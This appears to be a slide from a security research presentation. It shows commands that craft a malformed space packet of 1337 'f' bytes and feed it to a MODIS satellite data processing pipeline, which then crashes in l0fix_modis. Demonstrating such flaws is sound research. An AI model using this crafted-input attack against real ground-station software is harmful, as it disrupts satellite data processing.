\frametitle{Exploiting the decoder}
  \framesubtitle{Attack consequences}
  \begin{lstlisting}[basicstyle=\ttfamily\small,basewidth=0.6em]
$ printf %1337s  | tr " " "f"  | \
  spppack --type-flag telecommand \
            --sec-hdr-flag 1 \
            --app-id aqua_modis \
  > bad_packet.PDS
  \end{lstlisting}

  \pause
  \begin{lstlisting}[basicstyle=\ttfamily\small,basewidth=0.6em]
$ cat bad_packet.PDS good_packet_sequence.PDS \
    > ./data/MYD00F.A2015299...001.PDS
  \end{lstlisting}

  \pause
  \begin{lstlisting}[basicstyle=\ttfamily\small,basewidth=0.6em]
$ ./run_all.sh ./data/
DATA_PATH: /mnt/data
CONTAINER_RUNTIME: docker
  \end{lstlisting}

  \pause
  \begin{lstlisting}[basicstyle=\ttfamily\small,basewidth=0.6em]
### Processing new PDS:
  MYD00F.A2015299.2110.20152992235.001.PDS
  \end{lstlisting}

  \pause
  \begin{lstlisting}[basicstyle=\ttfamily\small,basewidth=0.6em]
### Running modisl1db l1a-geo initial processing
<@\textcolor{red}{l0fix\_modis: Unrecoverable error in l0fix\_modis!}@>
  \end{lstlisting}
